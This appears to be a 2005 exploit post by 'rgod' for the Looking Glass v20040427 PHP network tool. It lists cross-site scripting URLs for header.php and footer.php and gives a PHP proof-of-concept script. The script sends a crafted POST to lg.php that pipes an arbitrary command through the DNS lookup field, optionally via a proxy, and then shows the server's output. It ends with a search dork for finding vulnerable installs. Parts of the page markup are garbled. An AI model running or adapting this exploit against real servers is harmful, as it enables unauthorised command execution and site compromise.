Looking Glass arbitrary commands execution poc exploit by rgod

9.05 27/08/2005 Looking Glass v20040427 arbitrary commands execution / cross site scripting description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers. site: http://de-neef.net/articles.php?id=2&page=1 download page: http://de-neef.net/download.php?file=2 a) XSS: http://[target]/[path]/footer.php?version[fullname]= http://[target]/[path]/footer.php?version[homepage]="> http://[target]/[path]/footer.php?version[no]= http://[target]/[path]/header.php?version[fullname]= http://[target]/[path]/header.php?version[no]= http://[target]/[path]/header.php?version[author]=--> http://[target]/[path]/header.php?version[email]=--> b) arbitrary command execution: a user can execute arbitrary commands using pipe char in DNS lookup query field poc exploit: Looking Glass arbitrary commands execution poc exploit by rgod

9.05 27/08/2005

Loooking Glass remote commands execution poc exploit by rgod

a script by rgod at http://rgod.altervista.org

'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "

	".htmlentities($headeri[$li+$ki])."
0".$datai."	".$datai."		".htmlentities($headeri[$li])."

"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; if (($path<>'') and ($host<>'')) { if ($port=='') {$port=80;} $data="func=dnsa&ipv=ipv4&target=%7c".urlencode($command); if ($proxy=='') {$packet="POST ".$path."lg.php HTTP/1.1\r\n";} else { $c = preg_match_all($proxy_regex,$proxy,$is_proxy); if ($c==0) { echo 'check the proxy...
'; die; } else {$packet="POST http://".$host.$path."lg.php HTTP/1.1\r\n";} } $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.$path."\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; echo '
Sending exploit to '.$host.'
'; if ($proxy=='') {$fp=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $fp=fsockopen($parts[0],$parts[1]); if (!$fp) { echo 'No response from proxy...'; die; } } show($packet); fputs($fp,$packet); if ($proxy=='') { $data=''; while (!feof($fp)) { $data.=fgets($fp); } } else { $data=''; while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data))) { $data.=fread($fp,1); } } fclose($fp); if (eregi('HTTP/1.1 200 OK',$data)) {echo 'Exploit sent...
If Looking Glass is unpatched and vulnerable
'; echo 'you will see '.htmlentities($command).' output inside HTML...

'; } else {echo 'Error, see output...';} //show($data); //debug: show output in a packet dump... echo nl2br(htmlentities($data)); } ?> googledork: Looking Glass v20040427 rgod site: http://rgod.altervista.org mail: retrogod@aliceposta.it original advisory: http://rgod.altervista.org/lookingglass.html